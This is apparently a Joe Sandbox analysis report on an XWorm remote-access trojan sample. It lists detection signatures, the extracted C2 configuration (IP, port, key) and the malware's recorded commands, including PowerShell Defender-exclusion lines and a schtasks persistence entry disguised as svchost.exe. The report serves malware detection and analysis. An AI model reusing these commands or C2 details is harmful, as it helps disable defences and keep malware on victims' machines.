Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583455
MD5:838f4cdbbfc3d37d94c45da811be76a8
SHA1:822be42f201602ee3a7bb84363e1edd8dc595651
SHA256:c4d520b953525a1e9ad38ec6a8addef6584ca7e1d479bc1ddc6ef3a79a537bce
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 838F4CDBBFC3D37D94C45DA811BE76A8)
    • FullOption_2.1Xenos.exe (PID: 6632 cmdline: "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" MD5: C442A9B9299246B2E5683641A4341641)
      • FullOption_2.1Xenos.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" MD5: C442A9B9299246B2E5683641A4341641)
      • svchost.exe (PID: 2044 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
    • svchost.exe (PID: 5280 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
      • powershell.exe (PID: 3964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4424 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5964 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 1484 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 3840 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\svchost.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xc74b:$str01: $VB$Local_Port
      • 0xc778:$str02: $VB$Local_Host
      • 0xac5f:$str03: get_Jpeg
      • 0xb2bf:$str04: get_ServicePack
      • 0xde10:$str05: Select * from AntivirusProduct
      • 0xe707:$str06: PCRestart
      • 0xe71b:$str07: shutdown.exe /f /r /t 0
      • 0xe7cd:$str08: StopReport
      • 0xe7a3:$str09: StopDDos
      • 0xe899:$str10: sendPlugin
      • 0xea19:$str12: -ExecutionPolicy Bypass -File "
      • 0xec88:$str13: Content-length: 5235
      C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xd5c5:$s6: VirtualBox
      • 0xd523:$s8: Win32_ComputerSystem
      • 0xf17d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf21a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf32f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xeba3:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xd3c5:$s6: VirtualBox
        • 0xd323:$s8: Win32_ComputerSystem
        • 0xef7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xf01a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xf12f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xe9a3:$cnc4: POST / HTTP/1.1
        00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x39e3e:$s6: VirtualBox
          • 0x4c47e:$s6: VirtualBox
          • 0x39d9c:$s8: Win32_ComputerSystem
          • 0x4c3dc:$s8: Win32_ComputerSystem
          • 0x3c4c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x4eb04:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x3c561:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x4eba1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x3c676:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x4ecb6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x3b70a:$cnc4: POST / HTTP/1.1
          • 0x4dd4a:$cnc4: POST / HTTP/1.1
          00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.2cb6568.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.2.file.exe.2ca5528.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.file.exe.2cb6568.2.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                • 0xa94b:$str01: $VB$Local_Port
                • 0xa978:$str02: $VB$Local_Host
                • 0x8e5f:$str03: get_Jpeg
                • 0x94bf:$str04: get_ServicePack
                • 0xc010:$str05: Select * from AntivirusProduct
                • 0xc907:$str06: PCRestart
                • 0xc91b:$str07: shutdown.exe /f /r /t 0
                • 0xc9cd:$str08: StopReport
                • 0xc9a3:$str09: StopDDos
                • 0xca99:$str10: sendPlugin
                • 0xcc19:$str12: -ExecutionPolicy Bypass -File "
                • 0xce88:$str13: Content-length: 5235
                0.2.file.exe.2ca5528.1.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                • 0xa94b:$str01: $VB$Local_Port
                • 0xa978:$str02: $VB$Local_Host
                • 0x8e5f:$str03: get_Jpeg
                • 0x94bf:$str04: get_ServicePack
                • 0xc010:$str05: Select * from AntivirusProduct
                • 0xc907:$str06: PCRestart
                • 0xc91b:$str07: shutdown.exe /f /r /t 0
                • 0xc9cd:$str08: StopReport
                • 0xc9a3:$str09: StopDDos
                • 0xca99:$str10: sendPlugin
                • 0xcc19:$str12: -ExecutionPolicy Bypass -File "
                • 0xce88:$str13: Content-length: 5235
                0.2.file.exe.2ca5528.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xb7c5:$s6: VirtualBox
                • 0xb723:$s8: Win32_ComputerSystem
                • 0xd37d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xd41a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xd52f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xcda3:$cnc4: POST / HTTP/1.1
                Click to see the 27 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Files With System Process Name In Unsuspected Locations
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6204, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
                Sigma detected: Suspect Svchost Activity
                Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5964, ProcessName: svchost.exe
                Sigma detected: System File Execution Location Anomaly
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6204, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5280, ProcessName: svchost.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
                Sigma detected: Startup Folder File Write
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5280, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 4424, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 4424, ProcessName: schtasks.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6204, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5280, ProcessName: svchost.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3964, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6204, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 5280, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Schedule system process
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5280, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 4424, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-02T20:11:58.713923+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:12.020324+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:12.238556+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:25.101934+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:38.304580+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:42.246089+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:44.916589+010028528701Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-02T20:11:58.741684+010028529231Malware Command and Control Activity Detected192.168.2.84978845.141.26.1347000TCP
                2025-01-02T20:12:12.022175+010028529231Malware Command and Control Activity Detected192.168.2.84978845.141.26.1347000TCP
                2025-01-02T20:12:25.103841+010028529231Malware Command and Control Activity Detected192.168.2.84978845.141.26.1347000TCP
                2025-01-02T20:12:38.306446+010028529231Malware Command and Control Activity Detected192.168.2.84978845.141.26.1347000TCP
                2025-01-02T20:12:44.917491+010028529231Malware Command and Control Activity Detected192.168.2.84978845.141.26.1347000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-02T20:12:12.238556+010028528741Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                2025-01-02T20:12:42.246089+010028528741Malware Command and Control Activity Detected45.141.26.1347000192.168.2.849788TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-02T20:11:58.350785+010028559241Malware Command and Control Activity Detected192.168.2.84978845.141.26.1347000TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Found malware configuration
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeReversingLabs: Detection: 82%
                Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 91%
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 71%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: 45.141.26.134
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: 7000
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: %AppData%
                Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString decryptor: svchost.exe
